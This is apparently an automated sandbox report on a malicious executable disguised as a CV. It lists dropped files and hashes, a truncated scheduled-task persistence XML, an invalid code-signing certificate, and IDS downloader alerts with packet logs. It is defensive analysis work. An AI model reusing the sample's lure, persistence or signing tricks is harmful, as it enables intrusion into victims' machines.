SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_idfwexfp.szr.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rw1q1ujt.44t.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sv33tv2a.etd.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_udqbplrx.3c3.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v1xs4nun.ptp.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ylwee3hn.xov.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\tmp2EE5.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1586
Entropy (8bit):	5.116125197823295
Encrypted:	false
SSDEEP:	24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtpJxvn:cgergYrFdOFzOzN33ODOiDdKrsuTVv
MD5:	2467950646BF078800B371EA46150D6E
SHA1:	DF7C2579CB72E549C70E8C10C1388A701000EBAF
SHA-256:	4999655A08A6D2AB675436F037A2B3254FE87F0B3A7993A350638E586105DCF3
SHA-512:	B1D68EF523FEF928176BB36ED0A34C84617AFE3AABC9ABA2F4E36ACA4E17C24CB73039A41167FB226CD475D128ED118B54C0EF088AC6B970F414FE0ECD56399E
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

C:\Users\user\AppData\Local\Temp\tmp796.tmp

Download File

Process:	C:\Users\user\Desktop\Kayla Dennis CV.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1586
Entropy (8bit):	5.116125197823295
Encrypted:	false
SSDEEP:	24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtpJxvn:cgergYrFdOFzOzN33ODOiDdKrsuTVv
MD5:	2467950646BF078800B371EA46150D6E
SHA1:	DF7C2579CB72E549C70E8C10C1388A701000EBAF
SHA-256:	4999655A08A6D2AB675436F037A2B3254FE87F0B3A7993A350638E586105DCF3
SHA-512:	B1D68EF523FEF928176BB36ED0A34C84617AFE3AABC9ABA2F4E36ACA4E17C24CB73039A41167FB226CD475D128ED118B54C0EF088AC6B970F414FE0ECD56399E
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe

Download File

Process:	C:\Users\user\Desktop\Kayla Dennis CV.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	634888
Entropy (8bit):	7.8901190938192896
Encrypted:	false
SSDEEP:	12288:bMVmiWX9OeYHC89ljwRbfWwtODSyaAXd1mA1Ak6OsgSb4VqU+H4o5zBFtyakR:gTONYHFvjwRzCxXd1mvOsH6eYoLy5
MD5:	8F6D690E119684B1629D41F97B83FB23
SHA1:	46EFDB7AE7079A781723D75E390431AA4C6080E5
SHA-256:	C997AD9CAC5CB1CFC050A066E275AAE6A540443075B2641CA19331B3F065EE29
SHA-512:	AA25C86DA804170E08F3E4D5D64D7D07007BEE539B26B27BC39476DE4F99FCA8FC0D7EAA3854556D004217982AB36C83F8F15BB21CBF1FFCC382EDD911631D9C
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 30%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....;g..............0..Z..........~y... ........@.. ....................................@.................................,y..O....................z...6........................................................... ............... ..H............text....Y... ...Z.................. ..`.rsrc................\..............@..@.reloc...............x..............@..B................`y......H..........d...........<N.............................................j.(............s....(....&..0.................%.(...+.s....}...........%.(...+.%.(...+.s ...}.....s!...}.....s"...}......{....o#....{....o$....{....o%....{....o&...si...}.....0..4.......s'.....{.....(...+.H...()...r...p(.........(+...t^.....[...%......+(+...t^.....[...(-....%......+(+...t^.....[...(-....(-.........%...(...+o...+o0....{.....(...+.B...()...r...p(*......h...(+...t^.....[...%......+(+...t

C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\Kayla Dennis CV.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.8901190938192896
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Kayla Dennis CV.exe
File size:	634'888 bytes
MD5:	8f6d690e119684b1629d41f97b83fb23
SHA1:	46efdb7ae7079a781723d75e390431aa4c6080e5
SHA256:	c997ad9cac5cb1cfc050a066e275aae6a540443075b2641ca19331b3f065ee29
SHA512:	aa25c86da804170e08f3e4d5d64d7d07007bee539b26b27bc39476de4f99fca8fc0d7eaa3854556d004217982ab36c83f8f15bb21cbf1ffcc382edd911631d9c
SSDEEP:	12288:bMVmiWX9OeYHC89ljwRbfWwtODSyaAXd1mA1Ak6OsgSb4VqU+H4o5zBFtyakR:gTONYHFvjwRzCxXd1mvOsH6eYoLy5
TLSH:	F5D412A05B6E1222CBBF9E76B73462984771EA9B1873D34D1AD090D94B93F9120733C7
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....;g..............0..Z..........~y... ........@.. ....................................@................................

File Icon


Icon Hash:	0595150b64f0390f

Static PE Info

General

Entrypoint:	0x49797e
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x673B1080 [Mon Nov 18 10:01:36 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	13/11/2018 01:00:00 09/11/2021 00:59:59
Subject Chain	CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
Version:	3
Thumbprint MD5:	DABD77E44EF6B3BB91740FA46696B779
Thumbprint SHA-1:	5B9E273CF11941FD8C6BE3F038C4797BBE884268
Thumbprint SHA-256:	4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
Serial:	7C1118CBBADC95DA3752C46E47A27438

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x9792c	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x98000	0x1b10	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x97a00	0x3608
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x9a000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x95984	0x95a00	d04dafbfa5d989b67d1444b8fcb32d27	False	0.9068569862155389	data	7.899161344113745	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x98000	0x1b10	0x1c00	356b237d36446d0b71e758328f71fcb5	False	0.8078962053571429	data	7.243033681206881	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x9a000	0xc	0x200	0062e84d5133069e439f044e380a5419	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x98100	0x1439	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9592428047131544
RT_GROUP_ICON	0x9954c	0x14	data	1.05
RT_VERSION	0x99570	0x3a0	data	0.41810344827586204
RT_MANIFEST	0x99920	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-18T18:21:20.928058+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49711	132.226.247.73	80	TCP
2024-11-18T18:21:22.239368+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49711	132.226.247.73	80	TCP
2024-11-18T18:21:23.022502+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49713	188.114.96.3	443	TCP
2024-11-18T18:21:23.958124+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49714	132.226.247.73	80	TCP
2024-11-18T18:21:25.078851+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49715	188.114.96.3	443	TCP
2024-11-18T18:21:29.473739+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49721	132.226.247.73	80	TCP
2024-11-18T18:21:30.399933+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49726	188.114.96.3	443	TCP
2024-11-18T18:21:30.724304+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49721	132.226.247.73	80	TCP
2024-11-18T18:21:31.488065+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49731	188.114.96.3	443	TCP
2024-11-18T18:21:32.219380+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49732	188.114.96.3	443	TCP
2024-11-18T18:21:32.520608+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49733	132.226.247.73	80	TCP
2024-11-18T18:21:33.557836+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49741	188.114.96.3	443	TCP
2024-11-18T18:21:34.520631+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49748	132.226.247.73	80	TCP
2024-11-18T18:21:38.783324+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49773	188.114.96.3	443	TCP
2024-11-18T18:21:42.417169+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49796	188.114.96.3	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 18, 2024 18:21:19.545499086 CET	49711	80	192.168.2.5	132.226.247.73
Nov 18, 2024 18:21:19.550698042 CET	80	49711	132.226.247.73	192.168.2.5
Nov 18, 2024 18:21:19.550787926 CET	49711	80	192.168.2.5	132.226.247.73
Nov 18, 2024 18:21:19.552418947 CET	49711	80	192.168.2.5	132.226.247.73
Nov 18, 2024 18:21:19.557235956 CET	80	49711	132.226.247.73	192.168.2.5
Nov 18, 2024 18:21:20.416034937 CET	80	49711	132.226.247.73	192.168.2.5
Nov 18, 2024 18:21:20.446110010 CET	49711	80	192.168.2.5	132.226.247.73
Nov 18, 2024 18:21:20.451087952 CET	80	49711	132.226.247.73	192.168.2.5
Nov 18, 2024 18:21:20.713268042 CET	80	49711	132.226.247.73	192.168.2.5
Nov 18, 2024 18:21:20.791735888 CET	49712	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:20.791774035 CET	443	49712	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:20.792010069 CET	49712	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:20.808358908 CET	49712	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:20.808383942 CET	443	49712	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:20.927921057 CET	80	49711	132.226.247.73	192.168.2.5
Nov 18, 2024 18:21:20.928057909 CET	49711	80	192.168.2.5	132.226.247.73
Nov 18, 2024 18:21:21.467184067 CET	443	49712	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:21.467318058 CET	49712	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:21.482585907 CET	49712	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:21.482598066 CET	443	49712	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:21.482877970 CET	443	49712	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:21.557286024 CET	49712	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:21.603323936 CET	443	49712	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:21.729774952 CET	443	49712	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:21.729859114 CET	443	49712	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:21.730298042 CET	49712	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:21.788186073 CET	49712	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:21.931711912 CET	49711	80	192.168.2.5	132.226.247.73
Nov 18, 2024 18:21:21.936539888 CET	80	49711	132.226.247.73	192.168.2.5
Nov 18, 2024 18:21:22.190027952 CET	80	49711	132.226.247.73	192.168.2.5
Nov 18, 2024 18:21:22.195349932 CET	49713	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:22.195391893 CET	443	49713	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:22.195658922 CET	49713	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:22.196073055 CET	49713	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:22.196089983 CET	443	49713	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:22.239367962 CET	49711	80	192.168.2.5	132.226.247.73
Nov 18, 2024 18:21:22.840756893 CET	443	49713	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:22.843801022 CET	49713	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:22.843833923 CET	443	49713	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:23.022515059 CET	443	49713	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:23.022579908 CET	443	49713	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:23.022614002 CET	49713	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:23.023155928 CET	49713	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:23.028166056 CET	49711	80	192.168.2.5	132.226.247.73
Nov 18, 2024 18:21:23.029583931 CET	49714	80	192.168.2.5	132.226.247.73
Nov 18, 2024 18:21:23.033622026 CET	80	49711	132.226.247.73	192.168.2.5
Nov 18, 2024 18:21:23.033699036 CET	49711	80	192.168.2.5	132.226.247.73
Nov 18, 2024 18:21:23.034532070 CET	80	49714	132.226.247.73	192.168.2.5
Nov 18, 2024 18:21:23.034621954 CET	49714	80	192.168.2.5	132.226.247.73
Nov 18, 2024 18:21:23.034779072 CET	49714	80	192.168.2.5	132.226.247.73
Nov 18, 2024 18:21:23.039639950 CET	80	49714	132.226.247.73	192.168.2.5
Nov 18, 2024 18:21:23.909157038 CET	80	49714	132.226.247.73	192.168.2.5
Nov 18, 2024 18:21:23.911009073 CET	49715	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:23.911055088 CET	443	49715	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:23.911407948 CET	49715	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:23.911950111 CET	49715	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:23.911967993 CET	443	49715	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:23.958123922 CET	49714	80	192.168.2.5	132.226.247.73
Nov 18, 2024 18:21:24.919909954 CET	443	49715	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:24.921982050 CET	49715	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:24.921999931 CET	443	49715	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:25.078862906 CET	443	49715	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:25.078923941 CET	443	49715	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:25.078974962 CET	49715	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:25.079560995 CET	49715	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:25.084592104 CET	49716	80	192.168.2.5	132.226.247.73
Nov 18, 2024 18:21:25.089636087 CET	80	49716	132.226.247.73	192.168.2.5
Nov 18, 2024 18:21:25.089695930 CET	49716	80	192.168.2.5	132.226.247.73
Nov 18, 2024 18:21:25.089791059 CET	49716	80	192.168.2.5	132.226.247.73
Nov 18, 2024 18:21:25.094636917 CET	80	49716	132.226.247.73	192.168.2.5
Nov 18, 2024 18:21:25.975491047 CET	80	49716	132.226.247.73	192.168.2.5
Nov 18, 2024 18:21:25.977543116 CET	49717	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:25.977580070 CET	443	49717	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:25.977730989 CET	49717	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:25.978060961 CET	49717	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:25.978072882 CET	443	49717	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:26.020627975 CET	49716	80	192.168.2.5	132.226.247.73
Nov 18, 2024 18:21:26.695667982 CET	443	49717	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:26.697628021 CET	49717	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:26.697649956 CET	443	49717	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:26.870004892 CET	443	49717	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:26.870069027 CET	443	49717	188.114.96.3	192.168.2.5
Nov 18, 2024 18:21:26.870277882 CET	49717	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:26.870609045 CET	49717	443	192.168.2.5	188.114.96.3
Nov 18, 2024 18:21:26.873759031 CET	49716	80	192.168.2.5	132.226.247.73
Nov 18, 2024 18:21:26.874854088 CET	49718	80	192.168.2.5	132.226.247.73
Nov 18, 2024 18:21:26.879744053 CET	80	49716	132.226.247.73	192.168.2.5
Nov 18, 2024 18:21:26.879828930 CET	49716	80	192.168.2.5	132.226.247.73
Nov 18, 2024 18:21:26.880640030 CET	80	49718	132.226.247.73	192.168.2.5
Nov 18, 2024 18:21:26.880724907 CET	49718	80	192.168.2.5	132.226.247.73
Nov 18, 2024 18:21:26.880819082 CET	49718	80	192.168.2.5	132.226.247.73
Nov 18, 2024 18:21:26.886548996 CET	80	49718	132.226.247.73	192.168.2.5
